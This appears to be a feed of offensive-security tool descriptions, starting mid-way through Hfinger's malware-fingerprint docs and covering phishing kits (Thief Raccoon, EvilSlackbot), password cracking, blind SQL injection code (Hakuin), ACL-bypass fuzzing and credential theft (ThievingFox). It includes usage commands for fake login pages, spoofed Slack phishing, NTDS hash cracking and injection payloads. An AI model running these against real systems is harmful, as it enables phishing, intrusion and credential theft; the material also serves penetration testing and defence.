    Three parts of the request are analyzed to extract information: URI, headers' structure (including method and protocol version), and payload. Particular features of the fingerprint are separated using | (pipe). The final fingerprint generated for the POST request from the example is:

    2|3|1|php|0.6|PO|1|us-ag,ac,ac-en,ho,co,co-ty,co-le|us-ag:f452d7a9/ac:as-as/ac-en:id/co:Ke-Al/co-ty:te-pl|A|4|1.4

    The creation of features is described below in the order of appearance in the fingerprint.

    Firstly, URI features are extracted: * URI length represented as a logarithm base 10 of the length, rounded to an integer, (in the example URI is 43 characters long, so log10(43)β‰ˆ2), * number of directories, (in the example there are 3 directories), * average directory length, represented as a logarithm with base 10 of the actual average length of the directory, rounded to an integer, (in the example there are three directories with total length of 20 characters (6+6+8), so log10(20/3)β‰ˆ1), * extension of the requested file, but only if it is on a list of known extensions in hfinger/configs/extensions.txt, * average value length represented as a logarithm with base 10 of the actual average value length, rounded to one decimal point, (in the example two values have the same length of 4 characters, what is obviously equal to 4 characters, and log10(4)β‰ˆ0.6).

    Secondly, header structure features are analyzed: * request method encoded as first two letters of the method (PO), * protocol version encoded as an integer (1 for version 1.1, 0 for version 1.0, and 9 for version 0.9), * order of the headers, * and popular headers and their values.

    To represent order of the headers in the request, each header's name is encoded according to the schema in hfinger/configs/headerslow.json, for example, User-Agent header is encoded as us-ag. Encoded names are separated by ,. If the header name does not start with an upper case letter (or any of its parts when analyzing compound headers such as Accept-Encoding), then encoded representation is prefixed with !. If the header name is not on the list of the known headers, it is hashed using FNV1a hash, and the hash is used as encoding.

    When analyzing popular headers, the request is checked if they appear in it. These headers are: * Connection * Accept-Encoding * Content-Encoding * Cache-Control * TE * Accept-Charset * Content-Type * Accept * Accept-Language * User-Agent

    When the header is found in the request, its value is checked against a table of typical values to create pairs of header_name_representation:value_representation. The name of the header is encoded according to the schema in hfinger/configs/headerslow.json (as presented before), and the value is encoded according to schema stored in hfinger/configs directory or configs.py file, depending on the header. In the above example Accept is encoded as ac and its value */* as as-as (asterisk-asterisk), giving ac:as-as. The pairs are inserted into fingerprint in order of appearance in the request and are delimited using /. If the header value cannot be found in the encoding table, it is hashed using the FNV1a hash.
    If the header value is composed of multiple values, they are tokenized to provide a list of values delimited with ,, for example, Accept: */*, text/* would give ac:as-as,te-as. However, at this point of development, if the header value contains a "quality value" tag (q=), then the whole value is encoded with its FNV1a hash. Finally, values of User-Agent and Accept-Language headers are directly encoded using their FNV1a hashes.

    Finally, in the payload features: * presence of non-ASCII characters, represented with the letter N, and with A otherwise, * payload's Shannon entropy, rounded to an integer, * and payload length, represented as a logarithm with base 10 of the actual payload length, rounded to one decimal point.

    Report modes

    Hfinger operates in five report modes, which differ in features represented in the fingerprint, thus information extracted from requests. These are (with the number used in the tool configuration): * mode 0 - producing a similar number of collisions and fingerprints as mode 2, but using fewer features, * mode 1 - representing all designed features, but producing a little more collisions than modes 0, 2, and 4, * mode 2 - optimal (the default mode), representing all features which are usually used during requests' analysis, but also offering a low number of collisions and generated fingerprints, * mode 3 - producing the lowest number of generated fingerprints from all modes, but achieving the highest number of collisions, * mode 4 - offering the highest fingerprint entropy, but also generating slightly more fingerprints than modes 0-2.

    The modes were chosen in order to optimize Hfinger's capabilities to uniquely identify malware families versus the number of generated fingerprints. Modes 0, 2, and 4 offer a similar number of collisions between malware families, however, mode 4 generates a little more fingerprints than the other two. Mode 2 represents more request features than mode 0 with a comparable number of generated fingerprints and collisions. Mode 1 is the only one representing all designed features, but it increases the number of collisions by almost two times comparing to modes 0, 1, and 4. Mode 3 produces at least two times fewer fingerprints than other modes, but it introduces about nine times more collisions. Description of all designed features is here.

    The modes consist of features (in the order of appearance in the fingerprint): * mode 0: * number of directories, * average directory length represented as an integer, * extension of the requested file, * average value length represented as a float, * order of headers, * popular headers and their values, * payload length represented as a float. * mode 1: * URI length represented as an integer, * number of directories, * average directory length represented as an integer, * extension of the requested file, * variable length represented as an integer, * number of variables, * average value length represented as an integer, * request method, * version of protocol, * order of headers, * popular headers and their values, * presence of non-ASCII characters, * payload entropy represented as an integer, * payload length represented as an integer. * mode 2: * URI length represented as an integer, * number of directories, * average directory length represented as an integer, * extension of the requested file, * average value length represented as a float, * request method, * version of protocol, * order of headers, * popular headers and their values, * presence of non-ASCII characters, * payload entropy represented as an integer, * payload length represented as a float. * mode 3: * URI length represented as an integer, * average directory length represented as an integer, * extension of the requested file, * average value length represented as an integer, * order of headers. * mode 4: * URI length represented as a float, * number of directories, * average directory length represented as a float, * extension of the requested file, * variable length represented as a float, * average value length represented as a float, * request method, * version of protocol, * order of headers, * popular headers and their values, * presence of non-ASCII characters, * payload entropy represented as a float, * payload length represented as a float.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Thief Raccoon - Login Phishing Tool

    By: Unknown β€” June 6th 2024 at 12:30


    Thief Raccoon is a tool designed for educational purposes to demonstrate how phishing attacks can be conducted on various operating systems. This tool is intended to raise awareness about cybersecurity threats and help users understand the importance of security measures like 2FA and password management.


    Features

    • Phishing simulation for Windows 10, Windows 11, Windows XP, Windows Server, Ubuntu, Ubuntu Server, and macOS.
    • Capture user credentials for educational demonstrations.
    • Customizable login screens that mimic real operating systems.
    • Full-screen mode to enhance the phishing simulation.

    Installation

    Prerequisites

    • Python 3.x
    • pip (Python package installer)
    • ngrok (for exposing the local server to the internet)

    Download and Install

    1. Clone the repository:

    ```bash git clone https://github.com/davenisc/thief_raccoon.git cd thief_raccoon

    1. Install python venv

    ```bash apt install python3.11-venv

    1. Create venv:

    ```bash python -m venv raccoon_venv source raccoon_venv/bin/activate

    1. Install the required libraries:

    ```bash pip install -r requirements.txt

    Usage

    1. Run the main script:

    ```bash python app.py

    1. Select the operating system for the phishing simulation:

    After running the script, you will be presented with a menu to select the operating system. Enter the number corresponding to the OS you want to simulate.

    1. Access the phishing page:

    If you are on the same local network (LAN), open your web browser and navigate to http://127.0.0.1:5000.

    If you want to make the phishing page accessible over the internet, use ngrok.

    Using ngrok

    1. Download and install ngrok

    Download ngrok from ngrok.com and follow the installation instructions for your operating system.

    1. Expose your local server to the internet:

    2. Get the public URL:

    After running the above command, ngrok will provide you with a public URL. Share this URL with your test subjects to access the phishing page over the internet.

    How to install Ngrok on Linux?

    1. Install ngrok via Apt with the following command:

    ```bash curl -s https://ngrok-agent.s3.amazonaws.com/ngrok.asc \ | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null \ && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" \ | sudo tee /etc/apt/sources.list.d/ngrok.list \ && sudo apt update \ && sudo apt install ngrok

    1. Run the following command to add your authtoken to the default ngrok.yml

    ```bash ngrok config add-authtoken xxxxxxxxx--your-token-xxxxxxxxxxxxxx

    Deploy your app online

    1. Put your app online at ephemeral domain Forwarding to your upstream service. For example, if it is listening on port http://localhost:8080, run:

      ```bash ngrok http http://localhost:5000

    Example

    1. Run the main script:

    ```bash python app.py

    1. Select Windows 11 from the menu:

    ```bash Select the operating system for phishing: 1. Windows 10 2. Windows 11 3. Windows XP 4. Windows Server 5. Ubuntu 6. Ubuntu Server 7. macOS Enter the number of your choice: 2

    1. Access the phishing page:

    Open your browser and go to http://127.0.0.1:5000 or the ngrok public URL.

    Disclaimer

    This tool is intended for educational purposes only. The author is not responsible for any misuse of this tool. Always obtain explicit permission from the owner of the system before conducting any phishing tests.

    License

    This project is licensed under the MIT License. See the LICENSE file for details.

    ScreenShots

    Credits

    Developer: @davenisc Web: https://davenisc.com



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    ROPDump - A Command-Line Tool Designed To Analyze Binary Executables For Potential Return-Oriented Programming (ROP) Gadgets, Buffer Overflow Vulnerabilities, And Memory Leaks

    By: Zion3R β€” June 4th 2024 at 12:30


    ROPDump is a tool for analyzing binary executables to identify potential Return-Oriented Programming (ROP) gadgets, as well as detecting potential buffer overflow and memory leak vulnerabilities.


    Features

    • Identifies potential ROP gadgets in binary executables.
    • Detects potential buffer overflow vulnerabilities by analyzing vulnerable functions.
    • Generates exploit templates to make the exploit process faster
    • Identifies potential memory leak vulnerabilities by analyzing memory allocation functions.
    • Can print function names and addresses for further analysis.
    • Supports searching for specific instruction patterns.

    Usage

    • <binary>: Path to the binary file for analysis.
    • -s, --search SEARCH: Optional. Search for specific instruction patterns.
    • -f, --functions: Optional. Print function names and addresses.

    Examples

    • Analyze a binary without searching for specific instructions:

    python3 ropdump.py /path/to/binary

    • Analyze a binary and search for specific instructions:

    python3 ropdump.py /path/to/binary -s "pop eax"

    • Analyze a binary and print function names and addresses:

    python3 ropdump.py /path/to/binary -f



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    EvilSlackbot - A Slack Bot Phishing Framework For Red Teaming Exercises

    By: Zion3R β€” June 2nd 2024 at 12:30

    EvilSlackbot

    A Slack Attack Framework for conducting Red Team and phishing exercises within Slack workspaces.

    Disclaimer

    This tool is intended for Security Professionals only. Do not use this tool against any Slack workspace without explicit permission to test. Use at your own risk.


    Background

    Thousands of organizations utilize Slack to help their employees communicate, collaborate, and interact. Many of these Slack workspaces install apps or bots that can be used to automate different tasks within Slack. These bots are individually provided permissions that dictate what tasks the bot is permitted to request via the Slack API. To authenticate to the Slack API, each bot is assigned an api token that begins with xoxb or xoxp. More often than not, these tokens are leaked somewhere. When these tokens are exfiltrated during a Red Team exercise, it can be a pain to properly utilize them. Now EvilSlackbot is here to automate and streamline that process. You can use EvilSlackbot to send spoofed Slack messages, phishing links, files, and search for secrets leaked in slack.

    Phishing Simulations

    In addition to red teaming, EvilSlackbot has also been developed with Slack phishing simulations in mind. To use EvilSlackbot to conduct a Slack phishing exercise, simply create a bot within Slack, give your bot the permissions required for your intended test, and provide EvilSlackbot with a list of emails of employees you would like to test with simulated phishes (Links, files, spoofed messages)

    Installation

    EvilSlackbot requires python3 and Slackclient

    pip3 install slackclient

    Usage

    usage: EvilSlackbot.py [-h] -t TOKEN [-sP] [-m] [-s] [-a] [-f FILE] [-e EMAIL]
    [-cH CHANNEL] [-eL EMAIL_LIST] [-c] [-o OUTFILE] [-cL]

    options:
    -h, --help show this help message and exit

    Required:
    -t TOKEN, --token TOKEN
    Slack Oauth token

    Attacks:
    -sP, --spoof Spoof a Slack message, customizing your name, icon, etc
    (Requires -e,-eL, or -cH)
    -m, --message Send a message as the bot associated with your token
    (Requires -e,-eL, or -cH)
    -s, --search Search slack for secrets with a keyword
    -a, --attach Send a message containing a malicious attachment (Requires -f
    and -e,-eL, or -cH)

    Arguments:
    -f FILE, --file FILE Path to file attachment
    -e EMAIL, --email EMAIL
    Email of target
    -cH CHANNEL, --channel CHANNEL
    Target Slack Channel (Do not include #)
    -eL EMAIL_LIST, --email_list EMAIL_LIST
    Path to list of emails separated by newline
    -c, --check Lookup and display the permissions and available attacks
    associated with your provided token.
    -o OUTFILE, --outfile OUTFILE
    Outfile to store search results
    -cL, --channel_list List all public Slack channels

    Token

    To use this tool, you must provide a xoxb or xoxp token.

    Required:
    -t TOKEN, --token TOKEN (Slack xoxb/xoxp token)
    python3 EvilSlackbot.py -t <token>

    Attacks

    Depending on the permissions associated with your token, there are several attacks that EvilSlackbot can conduct. EvilSlackbot will automatically check what permissions your token has and will display them and any attack that you are able to perform with your given token.

    Attacks:
    -sP, --spoof Spoof a Slack message, customizing your name, icon, etc (Requires -e,-eL, or -cH)

    -m, --message Send a message as the bot associated with your token (Requires -e,-eL, or -cH)

    -s, --search Search slack for secrets with a keyword

    -a, --attach Send a message containing a malicious attachment (Requires -f and -e,-eL, or -cH)

    Spoofed messages (-sP)

    With the correct token permissions, EvilSlackbot allows you to send phishing messages while impersonating the botname and bot photo. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.

    python3 EvilSlackbot.py -t <xoxb token> -sP -e <email address>

    python3 EvilSlackbot.py -t <xoxb token> -sP -eL <email list>

    python3 EvilSlackbot.py -t <xoxb token> -sP -cH <Channel name>

    Phishing Messages (-m)

    With the correct token permissions, EvilSlackbot allows you to send phishing messages containing phishing links. What makes this attack different from the Spoofed attack is that this method will send the message as the bot associated with your provided token. You will not be able to choose the name or image of the bot sending your phish. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.

    python3 EvilSlackbot.py -t <xoxb token> -m -e <email address>

    python3 EvilSlackbot.py -t <xoxb token> -m -eL <email list>

    python3 EvilSlackbot.py -t <xoxb token> -m -cH <Channel name>

    Secret Search (-s)

    With the correct token permissions, EvilSlackbot allows you to search Slack for secrets via a keyword search. Right now, this attack requires a xoxp token, as xoxb tokens can not be given the proper permissions to keyword search within Slack. Use the -o argument to write the search results to an outfile.

    python3 EvilSlackbot.py -t <xoxp token> -s -o <outfile.txt>

    Attachments (-a)

    With the correct token permissions, EvilSlackbot allows you to send file attachments. The attachment attack requires a path to the file (-f) you wish to send. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.

    python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -e <email address>

    python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -eL <email list>

    python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -cH <Channel name>

    Arguments

    Arguments:
    -f FILE, --file FILE Path to file attachment
    -e EMAIL, --email EMAIL Email of target
    -cH CHANNEL, --channel CHANNEL Target Slack Channel (Do not include #)
    -eL EMAIL_LIST, --email_list EMAIL_LIST Path to list of emails separated by newline
    -c, --check Lookup and display the permissions and available attacks associated with your provided token.
    -o OUTFILE, --outfile OUTFILE Outfile to store search results
    -cL, --channel_list List all public Slack channels

    Channel Search

    With the correct permissions, EvilSlackbot can search for and list all of the public channels within the Slack workspace. This can help with planning where to send channel messages. Use -o to write the list to an outfile.

    python3 EvilSlackbot.py -t <xoxb token> -cL


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    LDAPWordlistHarvester - A Tool To Generate A Wordlist From The Information Present In LDAP, In Order To Crack Passwords Of Domain Accounts

    By: Zion3R β€” May 29th 2024 at 12:30


    A tool to generate a wordlist from the information present in LDAP, in order to crack non-random passwords of domain accounts.

    Β 

    Features

    The bigger the domain is, the better the wordlist will be.

    • [x] Creates a wordlist based on the following information found in the LDAP:
    • [x] User: name and sAMAccountName
    • [x] Computer: name and sAMAccountName
    • [x] Groups: name
    • [x] Organizational Units: name
    • [x] Active Directory Sites: name and descriptions
    • [x] All LDAP objects: descriptions
    • [x] Choose wordlist output file name with option --outputfile

    Demonstration

    To generate a wordlist from the LDAP of the domain domain.local you can use this command:

    ./LDAPWordlistHarvester.py -d 'domain.local' -u 'Administrator' -p 'P@ssw0rd123!' --dc-ip 192.168.1.101

    You will get the following output if using the Python version:

    You will get the following output if using the Powershell version:


    Cracking passwords

    Once you have this wordlist, you should crack your NTDS using hashcat, --loopback and the rule clem9669_large.rule.

    ./hashcat --hash-type 1000 --potfile-path ./client.potfile ./client.ntds ./wordlist.txt --rules ./clem9669_large.rule --loopback

    Usage

    $ ./LDAPWordlistHarvester.py -h
    LDAPWordlistHarvester.py v1.1 - by @podalirius_

    usage: LDAPWordlistHarvester.py [-h] [-v] [-o OUTPUTFILE] --dc-ip ip address [-d DOMAIN] [-u USER] [--ldaps] [--no-pass | -p PASSWORD | -H [LMHASH:]NTHASH | --aes-key hex key] [-k]

    options:
    -h, --help show this help message and exit
    -v, --verbose Verbose mode. (default: False)
    -o OUTPUTFILE, --outputfile OUTPUTFILE
    Path to output file of wordlist.

    Authentication & connection:
    --dc-ip ip address IP Address of the domain controller or KDC (Key Distribution Center) for Kerberos. If omitted it will use the domain part (FQDN) specified in the identity parameter
    -d DOMAIN, --domain DOMAIN
    (FQDN) domain to authenticate to
    -u USER, --user USER user to authenticate with
    --ldaps Use LDAPS instead of LDAP

    Credentials:
    --no- pass Don't ask for password (useful for -k)
    -p PASSWORD, --password PASSWORD
    Password to authenticate with
    -H [LMHASH:]NTHASH, --hashes [LMHASH:]NTHASH
    NT/LM hashes, format is LMhash:NThash
    --aes-key hex key AES key to use for Kerberos Authentication (128 or 256 bits)
    -k, --kerberos Use Kerberos authentication. Grabs credentials from .ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Pyrit - The Famous WPA Precomputed Cracker

    By: Zion3R β€” May 28th 2024 at 12:30


    Pyrit allows you to create massive databases of pre-computed WPA/WPA2-PSK authentication phase in a space-time-tradeoff. By using the computational power of Multi-Core CPUs and other platforms through ATI-Stream,Nvidia CUDA and OpenCL, it is currently by far the most powerful attack against one of the world's most used security-protocols.

    WPA/WPA2-PSK is a subset of IEEE 802.11 WPA/WPA2 that skips the complex task of key distribution and client authentication by assigning every participating party the same pre shared key. This master key is derived from a password which the administrating user has to pre-configure e.g. on his laptop and the Access Point. When the laptop creates a connection to the Access Point, a new session key is derived from the master key to encrypt and authenticate following traffic. The "shortcut" of using a single master key instead of per-user keys eases deployment of WPA/WPA2-protected networks for home- and small-office-use at the cost of making the protocol vulnerable to brute-force-attacks against it's key negotiation phase; it allows to ultimately reveal the password that protects the network. This vulnerability has to be considered exceptionally disastrous as the protocol allows much of the key derivation to be pre-computed, making simple brute-force-attacks even more alluring to the attacker. For more background see this article on the project's blog (Outdated).


    The author does not encourage or support using Pyrit for the infringement of peoples' communication-privacy. The exploration and realization of the technology discussed here motivate as a purpose of their own; this is documented by the open development, strictly sourcecode-based distribution and 'copyleft'-licensing.

    Pyrit is free software - free as in freedom. Everyone can inspect, copy or modify it and share derived work under the GNU General Public License v3+. It compiles and executes on a wide variety of platforms including FreeBSD, MacOS X and Linux as operation-system and x86-, alpha-, arm-, hppa-, mips-, powerpc-, s390 and sparc-processors.

    Attacking WPA/WPA2 by brute-force boils down to to computing Pairwise Master Keys as fast as possible. Every Pairwise Master Key is 'worth' exactly one megabyte of data getting pushed through PBKDF2-HMAC-SHA1. In turn, computing 10.000 PMKs per second is equivalent to hashing 9,8 gigabyte of data with SHA1 in one second.

    These are examples of how multiple computational nodes can access a single storage server over various ways provided by Pyrit:

    • A single storage (e.g. a MySQL-server)
    • A local network that can access the storage-server directly and provide four computational nodes on various levels with only one node actually accessing the storage server itself.
    • Another, untrusted network can access the storage through Pyrit's RPC-interface and provides three computional nodes, two of which actually access the RPC-interface.

    What's new

    • Fixed #479 and #481
    • Pyrit CUDA now compiles in OSX with Toolkit 7.5
    • Added use_CUDA and use_OpenCL in config file
    • Improved cores listing and managing
    • limit_ncpus now disables all CPUs when set to value <= 0
    • Improve CCMP packet identification, thanks to yannayl

    See CHANGELOG file for a better description.

    How to use

    Pyrit compiles and runs fine on Linux, MacOS X and BSD. I don't care about Windows; drop me a line (read: patch) if you make Pyrit work without copying half of GNU ... A guide for installing Pyrit on your system can be found in the wiki. There is also a Tutorial and a reference manual for the commandline-client.

    How to participate

    You may want to read this wiki-entry if interested in porting Pyrit to new hardware-platform. Contributions or bug reports you should [submit an Issue] (https://github.com/JPaulMora/Pyrit/issues).



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Hakuin - A Blazing Fast Blind SQL Injection Optimization And Automation Framework

    By: Zion3R β€” May 15th 2024 at 01:56


    Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, including pre-trained and adaptive language models, opportunistic guessing, parallelism and more.

    Hakuin has been presented at esteemed academic and industrial conferences: - BlackHat MEA, Riyadh, 2023 - Hack in the Box, Phuket, 2023 - IEEE S&P Workshop on Offsensive Technology (WOOT), 2023

    More information can be found in our paper and slides.


    Installation

    To install Hakuin, simply run:

    pip3 install hakuin

    Developers should install the package locally and set the -e flag for editable mode:

    git clone git@github.com:pruzko/hakuin.git
    cd hakuin
    pip3 install -e .

    Examples

    Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from the Requester and override the request method. Also, the method must determine whether the query resolved to True or False.

    Example 1 - Query Parameter Injection with Status-based Inference
    import aiohttp
    from hakuin import Requester

    class StatusRequester(Requester):
    async def request(self, ctx, query):
    r = await aiohttp.get(f'http://vuln.com/?n=XXX" OR ({query}) --')
    return r.status == 200
    Example 2 - Header Injection with Content-based Inference
    class ContentRequester(Requester):
    async def request(self, ctx, query):
    headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
    r = await aiohttp.get(f'http://vuln.com/', headers=headers)
    return 'found' in await r.text()

    To start extracting data, use the Extractor class. It requires a DBMS object to contruct queries and a Requester object to inject them. Hakuin currently supports SQLite, MySQL, PSQL (PostgreSQL), and MSSQL (SQL Server) DBMSs, but will soon include more options. If you wish to support another DBMS, implement the DBMS interface defined in hakuin/dbms/DBMS.py.

    Example 1 - Extracting SQLite/MySQL/PSQL/MSSQL
    import asyncio
    from hakuin import Extractor, Requester
    from hakuin.dbms import SQLite, MySQL, PSQL, MSSQL

    class StatusRequester(Requester):
    ...

    async def main():
    # requester: Use this Requester
    # dbms: Use this DBMS
    # n_tasks: Spawns N tasks that extract column rows in parallel
    ext = Extractor(requester=StatusRequester(), dbms=SQLite(), n_tasks=1)
    ...

    if __name__ == '__main__':
    asyncio.get_event_loop().run_until_complete(main())

    Now that eveything is set, you can start extracting DB metadata.

    Example 1 - Extracting DB Schemas
    # strategy:
    # 'binary': Use binary search
    # 'model': Use pre-trained model
    schema_names = await ext.extract_schema_names(strategy='model')
    Example 2 - Extracting Tables
    tables = await ext.extract_table_names(strategy='model')
    Example 3 - Extracting Columns
    columns = await ext.extract_column_names(table='users', strategy='model')
    Example 4 - Extracting Tables and Columns Together
    metadata = await ext.extract_meta(strategy='model')

    Once you know the structure, you can extract the actual content.

    Example 1 - Extracting Generic Columns
    # text_strategy:    Use this strategy if the column is text
    res = await ext.extract_column(table='users', column='address', text_strategy='dynamic')
    Example 2 - Extracting Textual Columns
    # strategy:
    # 'binary': Use binary search
    # 'fivegram': Use five-gram model
    # 'unigram': Use unigram model
    # 'dynamic': Dynamically identify the best strategy. This setting
    # also enables opportunistic guessing.
    res = await ext.extract_column_text(table='users', column='address', strategy='dynamic')
    Example 3 - Extracting Integer Columns
    res = await ext.extract_column_int(table='users', column='id')
    Example 4 - Extracting Float Columns
    res = await ext.extract_column_float(table='products', column='price')
    Example 5 - Extracting Blob (Binary Data) Columns
    res = await ext.extract_column_blob(table='users', column='id')

    More examples can be found in the tests directory.

    Using Hakuin from the Command Line

    Hakuin comes with a simple wrapper tool, hk.py, that allows you to use Hakuin's basic functionality directly from the command line. To find out more, run:

    python3 hk.py -h

    For Researchers

    This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the frozen version as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.

    Cite Hakuin

    @inproceedings{hakuin_bsqli,
    title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
    author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
    booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
    pages={384--393},
    year={2023},
    organization={IEEE}
    }


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    BypassFuzzer - Fuzz 401/403/404 Pages For Bypasses

    By: Zion3R β€” May 13th 2024 at 12:30


    The original 403fuzzer.py :)

    Fuzz 401/403ing endpoints for bypasses

    This tool performs various checks via headers, path normalization, verbs, etc. to attempt to bypass ACL's or URL validation.

    It will output the response codes and length for each request, in a nicely organized, color coded way so things are reaable.

    I implemented a "Smart Filter" that lets you mute responses that look the same after a certain number of times.

    You can now feed it raw HTTP requests that you save to a file from Burp.

    Follow me on twitter! @intrudir


    Usage

    usage: bypassfuzzer.py -h

    Specifying a request to test

    Best method: Feed it a raw HTTP request from Burp!

    Simply paste the request into a file and run the script!
    - It will parse and use cookies & headers from the request. - Easiest way to authenticate for your requests

    python3 bypassfuzzer.py -r request.txt

    Using other flags

    Specify a URL

    python3 bypassfuzzer.py -u http://example.com/test1/test2/test3/forbidden.html

    Specify cookies to use in requests:
    some examples:

    --cookies "cookie1=blah"
    -c "cookie1=blah; cookie2=blah"

    Specify a method/verb and body data to send

    bypassfuzzer.py -u https://example.com/forbidden -m POST -d "param1=blah&param2=blah2"
    bypassfuzzer.py -u https://example.com/forbidden -m PUT -d "param1=blah&param2=blah2"

    Specify custom headers to use with every request Maybe you need to add some kind of auth header like Authorization: bearer <token>

    Specify -H "header: value" for each additional header you'd like to add:

    bypassfuzzer.py -u https://example.com/forbidden -H "Some-Header: blah" -H "Authorization: Bearer 1234567"

    Smart filter feature!

    Based on response code and length. If it sees a response 8 times or more it will automatically mute it.

    Repeats are changeable in the code until I add an option to specify it in flag

    NOTE: Can't be used simultaneously with -hc or -hl (yet)

    # toggle smart filter on
    bypassfuzzer.py -u https://example.com/forbidden --smart

    Specify a proxy to use

    Useful if you wanna proxy through Burp

    bypassfuzzer.py -u https://example.com/forbidden --proxy http://127.0.0.1:8080

    Skip sending header payloads or url payloads

    # skip sending headers payloads
    bypassfuzzer.py -u https://example.com/forbidden -sh
    bypassfuzzer.py -u https://example.com/forbidden --skip-headers

    # Skip sending path normailization payloads
    bypassfuzzer.py -u https://example.com/forbidden -su
    bypassfuzzer.py -u https://example.com/forbidden --skip-urls

    Hide response code/length

    Provide comma delimited lists without spaces. Examples:

    # Hide response codes
    bypassfuzzer.py -u https://example.com/forbidden -hc 403,404,400

    # Hide response lengths of 638
    bypassfuzzer.py -u https://example.com/forbidden -hl 638

    TODO

    • [x] Automatically check other methods/verbs for bypass
    • [x] absolute domain attack
    • [ ] Add HTTP/2 support
    • [ ] Looking for ideas. Ping me on twitter! @intrudir


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    SQLMC - Check All Urls Of A Domain For SQL Injections

    By: Zion3R β€” May 10th 2024 at 12:30


    SQLMC (SQL Injection Massive Checker) is a tool designed to scan a domain for SQL injection vulnerabilities. It crawls the given URL up to a specified depth, checks each link for SQL injection vulnerabilities, and reports its findings.

    Features

    • Scans a domain for SQL injection vulnerabilities
    • Crawls the given URL up to a specified depth
    • Checks each link for SQL injection vulnerabilities
    • Reports vulnerabilities along with server information and depth

    Installation

    1. Install the required dependencies: bash pip3 install sqlmc

    Usage

    Run sqlmc with the following command-line arguments:

    • -u, --url: The URL to scan (required)
    • -d, --depth: The depth to scan (required)
    • -o, --output: The output file to save the results

    Example usage:

    sqlmc -u http://example.com -d 2

    Replace http://example.com with the URL you want to scan and 3 with the desired depth of the scan. You can also specify an output file using the -o or --output flag followed by the desired filename.

    The tool will then perform the scan and display the results.

    ToDo

    • Check for multiple GET params
    • Better injection checker trigger methods

    Credits

    License

    This project is licensed under the GNU Affero General Public License v3.0.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    HardeningMeter - Open-Source Python Tool Carefully Designed To Comprehensively Assess The Security Hardening Of Binaries And Systems

    By: Zion3R β€” May 5th 2024 at 12:30


    HardeningMeter is an open-source Python tool carefully designed to comprehensively assess the security hardening of binaries and systems. Its robust capabilities include thorough checks of various binary exploitation protection mechanisms, including Stack Canary, RELRO, randomizations (ASLR, PIC, PIE), None Exec Stack, Fortify, ASAN, NX bit. This tool is suitable for all types of binaries and provides accurate information about the hardening status of each binary, identifying those that deserve attention and those with robust security measures. Hardening Meter supports all Linux distributions and machine-readable output, the results can be printed to the screen a table format or be exported to a csv. (For more information see Documentation.md file)


    Execute Scanning Example

    Scan the '/usr/bin' directory, the '/usr/sbin/newusers' file, the system and export the results to a csv file.

    python3 HardeningMeter.py -f /bin/cp -s

    Installation Requirements

    Before installing HardeningMeter, make sure your machine has the following: 1. readelf and file commands 2. python version 3 3. pip 4. tabulate

    pip install tabulate

    Install HardeningMeter

    The very latest developments can be obtained via git.

    Clone or download the project files (no compilation nor installation is required)

    git clone https://github.com/OfriOuzan/HardeningMeter

    Arguments

    -f --file

    Specify the files you want to scan, the argument can get more than one file seperated by spaces.

    -d --directory

    Specify the directory you want to scan, the argument retrieves one directory and scan all ELF files recursively.

    -e --external

    Specify whether you want to add external checks (False by default).

    -m --show_missing

    Prints according to the order, only those files that are missing security hardening mechanisms and need extra attention.

    -s --system

    Specify if you want to scan the system hardening methods.

    -c --csv_format'

    Specify if you want to save the results to csv file (results are printed as a table to stdout by default).

    Results

    HardeningMeter's results are printed as a table and consisted of 3 different states: - (X) - This state indicates that the binary hardening mechanism is disabled. - (V) - This state indicates that the binary hardening mechanism is enabled. - (-) - This state indicates that the binary hardening mechanism is not relevant in this particular case.

    Notes

    When the default language on Linux is not English make sure to add "LC_ALL=C" before calling the script.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    ThievingFox - Remotely Retrieving Credentials From Password Managers And Windows Utilities

    By: Zion3R β€” April 30th 2024 at 12:30


    ThievingFox is a collection of post-exploitation tools to gather credentials from various password managers and windows utilities. Each module leverages a specific method of injecting into the target process, and then hooks internals functions to gather crendentials.

    The accompanying blog post can be found here


    Installation

    Linux

    Rustup must be installed, follow the instructions available here : https://rustup.rs/

    The mingw-w64 package must be installed. On Debian, this can be done using :

    apt install mingw-w64

    Both x86 and x86_64 windows targets must be installed for Rust:

    rustup target add x86_64-pc-windows-gnu
    rustup target add i686-pc-windows-gnu

    Mono and Nuget must also be installed, instructions are available here : https://www.mono-project.com/download/stable/#download-lin

    After adding Mono repositories, Nuget can be installed using apt :

    apt install nuget

    Finally, python dependancies must be installed :

    pip install -r client/requirements.txt

